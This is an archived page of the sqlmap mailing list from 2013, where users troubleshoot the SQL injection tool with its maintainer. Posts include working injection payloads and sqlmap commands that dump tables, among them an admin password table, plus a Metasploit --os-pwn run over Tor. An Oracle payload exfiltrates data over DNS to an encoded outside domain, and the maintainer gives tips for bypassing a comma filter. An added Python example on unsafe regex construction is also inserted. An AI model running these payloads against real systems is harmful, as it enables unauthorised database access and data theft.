sqlmap-users Mailing List for sqlmap (Page 33)
From: Miroslav S. <mir...@gm...> - 2013-07-31 15:30:40
Hi.

It should be supported now :) [1]

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/ca44b23d2064d02833093cc8a1d0a75e446ec86a

On Wed, Jul 31, 2013 at 12:40 PM, Sebastian Nerz <seb...@sy...> wrote:

> Hi,
>
> is there a way to access (read/write) Cookie values in custom defined
> Python code (--eval)?
>
> Thanks :)
>
> All the best,
>
> Sebastian Nerz

--
Miroslav Stampar
http://about.me/stamparm

From: Sebastian N. <seb...@sy...> - 2013-07-31 10:56:11
Hi,

is there a way to access (read/write) Cookie values in custom defined Python code (--eval)?

Thanks :)

All the best,

Sebastian Nerz

From: Miroslav S. <mir...@gm...> - 2013-07-29 09:50:54
Hi.

sqlmap is always trying to use the fastest technique available, and in case something goes wrong it retries with slower ones. In your case something went wrong with union and sqlmap resorted to the blind technique. The question is why.

Can you please send a traffic file for that run (-t traffic.txt --dump --fresh-queries -T ... -D ...). You don't have to let it run for the whole run. I am only interested in the first couple of requests.

Also, you could try to establish the problematic column for that case by using option -C ...

Kind regards,
Miroslav Stampar

On Jul 28, 2013 5:52 AM, "Carlos Silva" <r3...@r3...> wrote:

> Hi!
>
> I found an odd behavior on sqlmap. I threw it at a URL where it found
> this:
> Place: GET
> Parameter: pub
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: XXX=' OR '1'='1' AND 5523=5523 AND 'YIrb'='YIrb
>
> Type: UNION query
> Title: Generic UNION query (NULL) - 6 columns
> Payload: XXX=' OR '1'='1' UNION ALL SELECT
> NULL,NULL,CHR(113)||CHR(97)||CHR(101)||CHR(98)||CHR(113)||CHR(69)||CHR(111)||CHR(119)||CHR(107)||CHR(115)||CHR(118)||CHR(118)||CHR(66)||CHR(98)||CHR(115)||CHR(113)||CHR(110)||CHR(109)||CHR(107)||CHR(113),NULL,NULL,NULL
> FROM DUAL--
>
> Type: AND/OR time-based blind
> Title: Oracle AND time-based blind (heavy query)
> Payload: XXX=' OR '1'='1' AND 4237=(SELECT COUNT(*) FROM ALL_USERS
> T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DQxD'='DQxD
>
> So, the best way to dump the DB would be to use the UNION query since it
> can retrieve the whole table at a time.
>
> Now, the funny thing is that it actually used this for the first 4 or 5
> tables, which are 5 or 6 columns wide, but then, on a table with only 3
> columns it didn't. It is now using a slow-moving AND boolean-based attack
> to dump the table char-by-char but I can't understand why. Any known reason
> for this? Or am I just missing something?

From: Carlos S. <r3...@r3...> - 2013-07-28 03:52:01
Hi!

I found an odd behavior on sqlmap. I threw it at a URL where it found this:

Place: GET
Parameter: pub
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: XXX=' OR '1'='1' AND 5523=5523 AND 'YIrb'='YIrb

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: XXX=' OR '1'='1' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(97)||CHR(101)||CHR(98)||CHR(113)||CHR(69)||CHR(111)||CHR(119)||CHR(107)||CHR(115)||CHR(118)||CHR(118)||CHR(66)||CHR(98)||CHR(115)||CHR(113)||CHR(110)||CHR(109)||CHR(107)||CHR(113),NULL,NULL,NULL FROM DUAL--

Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: XXX=' OR '1'='1' AND 4237=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DQxD'='DQxD

So, the best way to dump the DB would be to use the UNION query since it can retrieve the whole table at a time.

Now, the funny thing is that it actually used this for the first 4 or 5 tables, which are 5 or 6 columns wide, but then, on a table with only 3 columns it didn't. It is now using a slow-moving AND boolean-based attack to dump the table char-by-char but I can't understand why. Any known reason for this? Or am I just missing something?

From: Miroslav S. <mir...@gm...> - 2013-07-27 09:22:00
Hi.

Thank you for your report and find it fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/495

On Mon, Jul 22, 2013 at 11:03 AM, ✿ <kim...@gm...> wrote:

> Hi! I was trying to use metasploit when this error came up.
>
> sqlmap version: 1.0-dev
> Python version: 2.7
> Operating system: nt
> Command line: sqlmap.py -u **************************************
> --check-tor --
> tor --tor-port=9150 --tor-type=SOCKS5 --mobile --os-pwn --msf-path
> C:\metasploit
> \apps\pro\msf3
> Technique: ERROR
> Back-end DBMS: PostgreSQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 95, in main
>     start()
>   File "C:\sqlmap\lib\controller\controller.py", line 602, in start
>     e = getUnicode(e)
>   File "C:\sqlmap\lib\core\common.py", line 1950, in getUnicode
>     return unicode(value) # encoding ignored for non-basestring instances
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x82 in position 76:
> ordinal
> not in range(128)
>
> [*] shutting down at 18:01:02
>
> -Vil

--
Miroslav Stampar
http://about.me/stamparm

From: ✿ <kim...@gm...> - 2013-07-22 09:03:56
Hi! I was trying to use metasploit when this error came up.

sqlmap version: 1.0-dev
Python version: 2.7
Operating system: nt
Command line: sqlmap.py -u ************************************** --check-tor --
tor --tor-port=9150 --tor-type=SOCKS5 --mobile --os-pwn --msf-path C:\metasploit
\apps\pro\msf3
Technique: ERROR
Back-end DBMS: PostgreSQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 95, in main
    start()
  File "C:\sqlmap\lib\controller\controller.py", line 602, in start
    e = getUnicode(e)
  File "C:\sqlmap\lib\core\common.py", line 1950, in getUnicode
    return unicode(value) # encoding ignored for non-basestring instances
UnicodeDecodeError: 'ascii' codec can't decode byte 0x82 in position 76: ordinal
not in range(128)

[*] shutting down at 18:01:02

-Vil

From: Miroslav S. <mir...@gm...> - 2013-07-21 21:41:09
Hi.

Well, both blind injection and dns exfiltration require usage of the comma character - because there is a need for extracting bits/characters/chunks (SUBSTRC).

Nonetheless, that method you referenced would require noticeable work to be done on the Oracle side.

I would suggest you try to use a manual dns exfiltration approach without SUBSTRC (whole query response into the dns request - and pray that it fits within the size limits)

Kind regards,
Miroslav Stampar

On Sun, Jul 21, 2013 at 3:43 PM, Marcell Fodor <fod...@gm...> wrote:

> Heya,
>
> Sqlmap identifies an Oracle blind injection point, but commas are filtered
> so I get no data even when using --dns-domain.
>
> Even with --dns-domain there are substrings (,) in query
> ---
> AND ASCII(SUBSTRC((SELECT
> UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT
> RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM
> DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122))
> FROM DUAL),8,1))>914 AND (7100=7100)
> ---
>
> Is there a way to do the technique described on this page with sqlmap?
>
> http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/
>
> M

--
Miroslav Stampar
http://about.me/stamparm

From: Marcell F. <fod...@gm...> - 2013-07-21 13:43:27
Heya,

Sqlmap identifies an Oracle blind injection point, but commas are filtered so I get no data even when using --dns-domain.

Even with --dns-domain there are substrings (,) in query
---
AND ASCII(SUBSTRC((SELECT UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122)) FROM DUAL),8,1))>914 AND (7100=7100)
---

Is there a way to do the technique described on this page with sqlmap?

http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/

M

From: Miroslav S. <mir...@gm...> - 2013-07-16 18:43:09
Hi.

Please retry everything from the beginning (--flush-session) with --text-only or --string.

Please try to run without --threads (there are cases when high number of connections cause problems at the web server side).

Kind regards,
Miroslav Stampar

On Jul 16, 2013 6:30 PM, "Vinicius Da Loop" <vin...@gm...> wrote:

> log:
>
> imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar" --technique=B
> --threads=10 --no-cast -T ilh_admin --dump
>
> sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 13:22:41
>
> [13:22:41] [INFO] resuming back-end DBMS 'mysql'
> [13:22:41] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ref
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS
> ---
> [13:22:41] [INFO] the back-end DBMS is MySQL
> web application technology: Apache
> back-end DBMS: MySQL 5
> [13:22:41] [WARNING] missing database parameter. sqlmap is going to use
> the current database to enumerate table(s) entries
> [13:22:41] [INFO] fetching current database
> [13:22:41] [INFO] retrieving the length of query output
> [13:22:41] [INFO] resumed: 22
>
> [snipped]
>
> [13:22:44] [INFO] retrieving the length of query output
> [13:22:44] [INFO] retrieved: 13
> [13:22:54] [INFO] retrieved: ?????????????
> [13:22:54] [INFO] retrieving the length of query output
> [13:22:54] [INFO] retrieved: 1
> [13:22:58] [INFO] retrieved: _
> [13:23:00] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> [13:23:00] [INFO] retrieving the length of query output
> [13:23:00] [INFO] retrieved: 10
> [13:23:09] [INFO] retrieved: ??????????
> [13:23:09] [INFO] analyzing table dump for possible password hashes
> Database: hostl347
> Table: ilh_admin
> [1 entry]
> +----+------------+---------------+
> | id | pass       | admin         |
> +----+------------+---------------+
> |    | ?????????? | ????????????? |
> +----+------------+---------------+

From: Vinicius Da L. <vin...@gm...> - 2013-07-16 16:29:27
log:

imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar" --technique=B --threads=10 --no-cast -T ilh_admin --dump

sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:22:41

[13:22:41] [INFO] resuming back-end DBMS 'mysql'
[13:22:41] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ref
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS
---
[13:22:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:22:41] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:22:41] [INFO] fetching current database
[13:22:41] [INFO] retrieving the length of query output
[13:22:41] [INFO] resumed: 22

[snipped]

[13:22:44] [INFO] retrieving the length of query output
[13:22:44] [INFO] retrieved: 13
[13:22:54] [INFO] retrieved: ?????????????
[13:22:54] [INFO] retrieving the length of query output
[13:22:54] [INFO] retrieved: 1
[13:22:58] [INFO] retrieved: _
[13:23:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:23:00] [INFO] retrieving the length of query output
[13:23:00] [INFO] retrieved: 10
[13:23:09] [INFO] retrieved: ??????????
[13:23:09] [INFO] analyzing table dump for possible password hashes
Database: hostl347
Table: ilh_admin
[1 entry]
+----+------------+---------------+
| id | pass       | admin         |
+----+------------+---------------+
|    | ?????????? | ????????????? |
+----+------------+---------------+

From: Miroslav S. <mir...@gm...> - 2013-07-14 09:03:46
You are running it from a cmd file. That's the problem of opening and closing window. Please use command prompt. Sqlmap doesn't open new windows for sure.

Log file is being filled only with usable data. If there was no SQLi found the log file will be empty.

Bye

On Jul 14, 2013 3:58 AM, "Sumalee Kantawut" <ska...@gm...> wrote:

> Thanks for the quick answer.
>
> I've tried to run sqlmap from a cmd file:
>
> E:
> cd \SqlMap
> cmd /q /k E:\Python\Python-Portable.exe sqlmap.py -u ...
>
> But that doesn't prevent sqlmap from closing its window because sqlmap
> still opens its own console window.
>
> Why is the log file in the output folder empty?
>
> Thanks,
> Sumalee
>
> On 14.07.2013 03:22, Miroslav Stampar wrote:
>
>> Hi.
>>
>> Run sqlmap from a command prompt. You are probably running it by double
>> clicking.
>>
>> Kind regards,
>> Miroslav Stampar
>> On Jul 13, 2013 8:29 PM, "Sumalee Kantawut" <ska...@gm...> wrote:
>>
>>> Hi,
>>>
>>> I'm running sqlmap on Windows 7.
>>> Sqlmap closes its window after completing the job. The log file in the
>>> output folder is empty. So all output is lost. I can't redirect the
>>> output to a file because sqlmap opens its own window.
>>> Could you please tell me how to preserve the output?
>>>
>>> Regards,
>>> Sumalee

From: Sumalee K. <ska...@gm...> - 2013-07-14 01:58:28
Thanks for the quick answer.

I've tried to run sqlmap from a cmd file:

E:
cd \SqlMap
cmd /q /k E:\Python\Python-Portable.exe sqlmap.py -u ...

But that doesn't prevent sqlmap from closing its window because sqlmap still opens its own console window.

Why is the log file in the output folder empty?

Thanks,
Sumalee

On 14.07.2013 03:22, Miroslav Stampar wrote:

> Hi.
>
> Run sqlmap from a command prompt. You are probably running it by double
> clicking.
>
> Kind regards,
> Miroslav Stampar
> On Jul 13, 2013 8:29 PM, "Sumalee Kantawut" <ska...@gm...> wrote:
>
>> Hi,
>>
>> I'm running sqlmap on Windows 7.
>> Sqlmap closes its window after completing the job. The log file in the
>> output folder is empty. So all output is lost. I can't redirect the
>> output to a file because sqlmap opens its own window.
>> Could you please tell me how to preserve the output?
>>
>> Regards,
>> Sumalee

From: Miroslav S. <mir...@gm...> - 2013-07-13 20:23:02
Hi.

Run sqlmap from a command prompt. You are probably running it by double clicking.

Kind regards,
Miroslav Stampar

On Jul 13, 2013 8:29 PM, "Sumalee Kantawut" <ska...@gm...> wrote:

> Hi,
>
> I'm running sqlmap on Windows 7.
> Sqlmap closes its window after completing the job. The log file in the
> output folder is empty. So all output is lost. I can't redirect the
> output to a file because sqlmap opens its own window.
> Could you please tell me how to preserve the output?
>
> Regards,
> Sumalee

From: Sumalee K. <ska...@gm...> - 2013-07-13 14:33:03
Hi,

I'm running sqlmap on Windows 7.
Sqlmap closes its window after completing the job. The log file in the output folder is empty. So all output is lost. I can't redirect the output to a file because sqlmap opens its own window.
Could you please tell me how to preserve the output?

Regards,
Sumalee

From: Miroslav S. <mir...@gm...> - 2013-07-11 08:25:24
Hi.

Thank you for your report and find it fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/dc1623a40fc35ce11b452f682476460f0c613910

On Thu, Jul 11, 2013 at 6:48 AM, 沸水浮冰 <sf...@gm...> wrote:

> [00:44:39] [CRITICAL] unhandled exception in sqlmap/1.0-dev-1ae68b9, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-1ae68b9
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap.py -r lulu_1216.txt --level=5 --risk=3
> --tamper=between --identify-waf -p email -v 3
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/root/sqlmap-dev/lib/controller/controller.py", line 469, in start
>     check = heuristicCheckSqlInjection(place, parameter)
>   File "/root/sqlmap-dev/lib/controller/checks.py", line 751, in
> heuristicCheckSqlInjection
>     payload = agent.payload(place, parameter, newValue=payload)
>   File "/root/sqlmap-dev/lib/core/agent.py", line 145, in payload
>     retVal = re.sub(r"(\A|\b)%s=%s" % (parameter, origValue), "%s=%s" %
> (parameter, self.addPayloadDelimiters(newValue)), paramString)
>   File "/usr/lib/python2.7/re.py", line 151, in sub
>     return _compile(pattern, flags).sub(repl, string, count)
>   File "/usr/lib/python2.7/re.py", line 242, in _compile
>     raise error, v # invalid expression
> error: unbalanced parenthesis

--
Miroslav Stampar
http://about.me/stamparm

From: 沸水浮冰 <sf...@gm...> - 2013-07-11 04:48:41
[00:44:39] [CRITICAL] unhandled exception in sqlmap/1.0-dev-1ae68b9, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-1ae68b9
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap.py -r lulu_1216.txt --level=5 --risk=3 --tamper=between --identify-waf -p email -v 3
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/root/sqlmap-dev/lib/controller/controller.py", line 469, in start
    check = heuristicCheckSqlInjection(place, parameter)
  File "/root/sqlmap-dev/lib/controller/checks.py", line 751, in heuristicCheckSqlInjection
    payload = agent.payload(place, parameter, newValue=payload)
  File "/root/sqlmap-dev/lib/core/agent.py", line 145, in payload
    retVal = re.sub(r"(\A|\b)%s=%s" % (parameter, origValue), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
  File "/usr/lib/python2.7/re.py", line 151, in sub
    return _compile(pattern, flags).sub(repl, string, count)
  File "/usr/lib/python2.7/re.py", line 242, in _compile
    raise error, v # invalid expression
error: unbalanced parenthesis

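The traceback above ends in a `re.sub()` call whose pattern is built from the request's parameter name and value. The following is an added example, not sqlmap's code and not necessarily how the referenced commit fixed it: it reproduces the same class of failure and shows one way to keep request data literal on both sides of the substitution. The function names and all sample inputs are constructed for illustration.

```python
import re


def replace_param_unsafe(param_string, parameter, orig_value, new_value):
    """Same shape as the re.sub() call in the traceback: raw request data is
    interpolated into the pattern and into the replacement template."""
    pattern = r"(\A|\b)%s=%s" % (parameter, orig_value)
    return re.sub(pattern, "%s=%s" % (parameter, new_value), param_string)


def replace_param_safe(param_string, parameter, orig_value, new_value):
    """Treat the parameter name and both values as literal text."""
    pattern = r"(\A|\b)%s=%s" % (re.escape(parameter), re.escape(orig_value))
    replacement = "%s=%s" % (parameter, new_value)
    # A callable replacement is inserted verbatim; a string replacement would
    # have backslash sequences such as \1 expanded by re.sub().
    return re.sub(pattern, lambda match: replacement, param_string)


def outcome(func, *args):
    """Return the function's result, or a description of the re.error raised."""
    try:
        return func(*args)
    except re.error as exc:
        return "re.error: %s" % exc


# Constructed inputs: (parameter string, parameter, original value, new value)
CASES = [
    # 1. A ')' in the original value makes the pattern fail to compile.
    ("email=a)b@example.com&id=1", "email", "a)b@example.com", "NEW"),
    # 2. A '+' compiles, but now means "one or more", so nothing matches and
    #    the string comes back unchanged without any error.
    ("q=1+1&id=5", "q", "1+1", "NEW"),
    # 3. A backslash sequence in the new value is expanded as a group
    #    reference when the replacement is passed as a string.
    ("email=bob&id=1", "email", "bob", r"x\1y"),
]


def run_cases():
    """Return (unsafe outcome, safe outcome) for every constructed case."""
    return [
        (outcome(replace_param_unsafe, *case), outcome(replace_param_safe, *case))
        for case in CASES
    ]


if __name__ == "__main__":
    for case, (unsafe, safe) in zip(CASES, run_cases()):
        print("input :", case[0])
        print("unsafe:", unsafe)
        print("safe  :", safe)
        print()
```

Cases 2 and 3 matter more in practice than the crash in case 1, because they change the result silently instead of raising.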
From: Miroslav S. <mir...@gm...> - 2013-07-09 09:10:02
Hi Mehmet.

It's not quite clear what's the problem here (is it sending of lengthy resuming strings in subsequent requests?). Can you please give more information?

Kind regards,
Miroslav Stampar

On Tue, Jul 9, 2013 at 5:20 AM, <ma...@gm...> wrote:

> Dear All,
>
> I've the following situation with the api and need your help.
>
> I can request for database and table enumerations and can use their
> values as dictionaries in python.
> The value looks like that:
> "value": {
> "user_login": {
> "length": 10,
> "values":["root", "admin"]
>
> }
>
> }
>
> Afterwards it's once possible to start an enumeration for columns
> All subsequent requests supply strings as value.
> Likewise I've the case when I want dump more than one table.
> And the values look like that:
>
> "value": "{u'user_login': {u'length': 10, u'values': [u'root', u'admin']},
> u'ID': {u'length': 2, u'values': [u'1', u'2']}, u'__infos__': {u'count': 2,
> u'table': u'wpx_users', u'db': u'wp35'}}
> [00:07:32] [INFO] resumed: \"term_id\",\"bigint(20) unsigned\"\r\n
> [00:07:32] [INFO] resumed: \"name\",\"varchar(200)\"\r\n
> ...
> }
>
> In this case I tried with new task id, but the disadvantage is that
> it takes a long time until each table dump is done.
> I hope for your help and wish there is a possibility.
> I apologize for my bad English. =)
>
> Yours faithfully
>
> Mehmet Öztürk

--
Miroslav Stampar
http://about.me/stamparm

From: <ma...@gm...> - 2013-07-09 03:20:17
Dear All,

I've the following situation with the api and need your help.

I can request for database and table enumerations and can use their values as dictionaries in python.
The value looks like that:
"value": {
"user_login": {
"length": 10,
"values":["root", "admin"]
}
}

Afterwards it's once possible to start an enumeration for columns
All subsequent requests supply strings as value.
Likewise I've the case when I want dump more than one table.
And the values look like that:

"value": "{u'user_login': {u'length': 10, u'values': [u'root', u'admin']}, u'ID': {u'length': 2, u'values': [u'1', u'2']}, u'__infos__': {u'count': 2, u'table': u'wpx_users', u'db': u'wp35'}}
[00:07:32] [INFO] resumed: \"term_id\",\"bigint(20) unsigned\"\r\n
[00:07:32] [INFO] resumed: \"name\",\"varchar(200)\"\r\n
...
}

In this case I tried with new task id, but the disadvantage is that it takes a long time until each table dump is done.
I hope for your help and wish there is a possibility.
I apologize for my bad English. =)

Yours faithfully

Mehmet Öztürk

From: Miroslav S. <mir...@gm...> - 2013-07-02 13:07:07
|
Hi Jacco.

Thank you for your report and find it fixed with the latest commit.

Kind regards,
Miroslav Stampar

[1]

p.s. if you are searching for tables containing user in its name try first with "--search -T user"

On Tue, Jul 2, 2013 at 2:27 PM, Jacco van Tuijl <jac...@gm...> wrote:

> [14:26:08] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: POST
> Parameter: answer
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: answer=Fpxn) AND 3085=3085 AND
> (7792=7792&method=1&step=HVWK&prevstep=1&allanswers=JoKh&productpagenr=
> ---
> [14:26:09] [INFO] the back-end DBMS is Oracle
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Oracle
> [14:26:09] [WARNING] missing database parameter. sqlmap is going to use
> the current database to enumerate table(s) entries
> [14:26:09] [INFO] fetching current database
> [14:26:09] [WARNING] running in a single-thread mode. Please consider
> usage of option '--threads' for faster data retrieval
> [14:26:09] [INFO] retrieved:
> [14:26:10] [WARNING] reflective value(s) found and filtering out
>
> [14:26:14] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> [14:26:14] [WARNING] missing database parameter. sqlmap is going to use
> the current database to enumerate table(s) columns
> [14:26:14] [INFO] fetching current database
> [14:26:14] [INFO] retrieved:
> [14:26:19] [INFO] fetching columns for table 'USER' in database 'None'
>
> [14:26:19] [CRITICAL] unhandled exception in sqlmap/1.0-dev-5882ab5, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-5882ab5
> Python version: 2.6.5
> Operating system: posix
> Command line: sqlmap.py -u
> ************************************************ --dbms=oracle --data
> answer=&method=1&step=&prevstep=1&allanswers=&productpagenr= --level=5
> --risk=3 --dump -T User --exclude-sysdb --batch --fresh-queries
> Technique: BOOLEAN
> Back-end DBMS: Oracle (fingerprinted)
> Traceback (most recent call last):
> File "sqlmap.py", line 95, in main
> start()
> File "/usr/src/sqlmap-dev/lib/controller/controller.py", line 576, in
> start
> action()
> File "/usr/src/sqlmap-dev/lib/controller/action.py", line 127, in action
> conf.dbmsHandler.dumpTable()
> File "/usr/src/sqlmap-dev/plugins/generic/entries.py", line 104, in
> dumpTable
> self.getColumns(onlyColNames=True)
> File "/usr/src/sqlmap-dev/plugins/generic/databases.py", line 600, in
> getColumns
> query = rootQuery.blind.count %
> (unsafeSQLIdentificatorNaming(tbl.upper()),
> unsafeSQLIdentificatorNaming(conf.db.upper()))
> AttributeError: 'NoneType' object has no attribute 'upper'
>
>
> Kind regards,
> Jacco van Tuijl

--
Miroslav Stampar
http://about.me/stamparm |
From: Jacco v. T. <jac...@gm...> - 2013-07-02 12:27:24
|
[14:26:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: answer
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: answer=Fpxn) AND 3085=3085 AND (7792=7792&method=1&step=HVWK&prevstep=1&allanswers=JoKh&productpagenr=
---
[14:26:09] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[14:26:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[14:26:09] [INFO] fetching current database
[14:26:09] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:26:09] [INFO] retrieved:
[14:26:10] [WARNING] reflective value(s) found and filtering out

[14:26:14] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:26:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[14:26:14] [INFO] fetching current database
[14:26:14] [INFO] retrieved:
[14:26:19] [INFO] fetching columns for table 'USER' in database 'None'

[14:26:19] [CRITICAL] unhandled exception in sqlmap/1.0-dev-5882ab5, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to ' sql...@li...' or open a new issue at ' https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-5882ab5
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py -u ************************************************ --dbms=oracle --data answer=&method=1&step=&prevstep=1&allanswers=&productpagenr= --level=5 --risk=3 --dump -T User --exclude-sysdb --batch --fresh-queries
Technique: BOOLEAN
Back-end DBMS: Oracle (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 95, in main
    start()
  File "/usr/src/sqlmap-dev/lib/controller/controller.py", line 576, in start
    action()
  File "/usr/src/sqlmap-dev/lib/controller/action.py", line 127, in action
    conf.dbmsHandler.dumpTable()
  File "/usr/src/sqlmap-dev/plugins/generic/entries.py", line 104, in dumpTable
    self.getColumns(onlyColNames=True)
  File "/usr/src/sqlmap-dev/plugins/generic/databases.py", line 600, in getColumns
    query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
AttributeError: 'NoneType' object has no attribute 'upper'

Kind regards,
Jacco van Tuijl |
From: Miroslav S. <mir...@gm...> - 2013-06-28 08:30:13
|
p.s. just in case, try to rerun with
A) --union-char=1
B) --text-only

p.p.s. if every time you have a different number in "appears to be UNION injectable with x columns" then the page "dynamicity" is screwing you up

On Fri, Jun 28, 2013 at 10:24 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Heidi.
>
> 1) appears != is. I am not sure if there is much explanation here to be
> done. To sqlmap something "appeared" to be injectable (because of our
> heuristic mechanisms) and in further MORE SERIOUS testing it concluded that
> "it is not injectable"
> 2) New info is being logged, but only data from "is injectable" cases
>
> Kind regards,
> Miroslav Stampar
>
>
> On Fri, Jun 28, 2013 at 7:35 AM, Heidi Petersen <hei...@gm...> wrote:
>
>> Hello! New to sqlmap and I'm running some long tests, but I have a few
>> questions.
>>
>> I'm seeing
>> [INFO] target URL appears to be UNION injectable with x columns
>> and then
>> [WARNING] GET parameter 'xxxxxxx' is not injectable
>>
>> there is nothing in the log file.
>>
>> So two questions:
>> 1)if it seemed injectable but then ran further tests, why does it say
>> it's injectable and then that parameter isn't?
>> 2)I ran this with a lower level earlier in the day on the same target. I
>> didn't replace the log file. Is the new info being logged or am I losing
>> this info?
>>
>> Much appreciated,
>> Heidi
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2013-06-28 08:24:19
|
Hi Heidi.

1) appears != is. I am not sure if there is much explanation here to be done. To sqlmap something "appeared" to be injectable (because of our heuristic mechanisms) and in further MORE SERIOUS testing it concluded that "it is not injectable"
2) New info is being logged, but only data from "is injectable" cases

Kind regards,
Miroslav Stampar

